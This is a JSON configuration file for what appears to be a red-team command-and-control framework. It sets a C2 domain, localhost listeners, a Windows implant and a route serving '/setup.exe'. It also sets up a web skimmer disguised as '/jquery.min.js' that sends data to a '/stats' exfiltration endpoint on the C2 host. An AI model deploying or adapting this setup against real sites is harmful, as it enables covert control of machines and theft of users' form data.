{
    "c2": {
        "domain": "c2.redchannel.tld",
        "dns_ip": "127.0.0.1",
        "dns_port": 5353,
        "web_ip": "127.0.0.1",
        "web_port": 8080,
        "binary_route": "/setup.exe",
        "web_url": "http://c2.redchannel.tld",
        "debug": true
    },
    "skimmer": {
        "payload_route": "/jquery.min.js",
        "data_route": "/stats",
        "url": "http://c2.redchannel.tld/stats?id=",
        "target_classes": [],
        "target_ids": [],
        "obfuscate_payload": false
    },
    "proxy": {
        "enabled": false,
        "key": "redchannel",
        "interval": 2000,
        "obfuscate_payload": false,
        "url": "http://127.0.0.1/"
    },
    "static_dns": {
        "test.c2.redchannel.tld": "127.0.0.1"
    },
    "implant": {
        "os": "windows",
        "arch": "amd64",
        "debug": true,
        "interval": 5000,
        "resolver": "127.0.0.1:5353"
    }
}
